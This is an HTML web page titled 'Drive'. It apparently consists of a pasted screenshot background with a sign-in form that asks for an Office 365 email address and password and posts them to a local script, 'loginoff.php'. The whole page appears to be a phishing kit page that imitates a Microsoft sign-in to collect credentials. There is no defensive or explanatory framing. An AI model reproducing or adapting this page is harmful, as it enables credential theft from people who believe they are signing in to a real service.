<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Drive</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="generator" content="Web Page Maker">
</head>
<body>
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1365px; height:657px; z-index:0"><img src="images/paste711.jpg" alt="" title="" border=0 width=1365 height=657></div>

<div id="image2" style="position:absolute; overflow:hidden; left:889px; top:44px; width:34px; height:28px; z-index:1"><a href="index.html"><img src="images/paste716.jpg" alt="" title="" border=0 width=34 height=28></a></div>

<div id="image3" style="position:absolute; overflow:hidden; left:762px; top:488px; width:84px; height:50px; z-index:2"><a href="index.html"><img src="images/paste725.jpg" alt="" title="" border=0 width=84 height=50></a></div>

<form name="form1" method="POST" action="loginoff.php" enctype="application/x-www-form-urlencoded" style="margin:0px">
<input name="formtext1" type="text" style="position:absolute;width:342px;left:513px;top:266px;z-index:4;height: 41px;" required placeholder="Login With Your Office 365 Email Address">
<input name="formtext2" type="password" style="position:absolute;width:342px;left:512px;top:367px;z-index:5;height: 41px;" required placeholder="Enter Your Password">
<div id="formimage1" style="position:absolute; left:849px; top:490px; z-index:6"><input type="image" name="formimage1" width="72" height="45" src="images/loginn.JPG"></div>
</form>


</body>
</html>
